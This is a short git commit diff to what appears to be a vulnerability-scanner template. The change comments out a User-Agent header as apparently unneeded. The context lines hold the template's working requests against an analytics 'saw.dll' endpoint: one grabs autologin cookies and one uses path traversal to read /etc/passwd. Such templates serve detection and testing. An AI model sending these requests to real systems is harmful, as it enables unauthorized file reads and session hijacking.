Passing User-Agent seems redudant

patch-1
Noam Rathaus 2021-03-11 17:30:25 +02:00
parent 0899ab1816
commit f668c022fe
1 changed files with 3 additions and 2 deletions

View File

@ -12,8 +12,9 @@ info:
requests: requests:
- method: GET - method: GET
headers: # Why is the header needed here? it doesn't appear to be required by the exploit
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 # headers:
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
path: path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'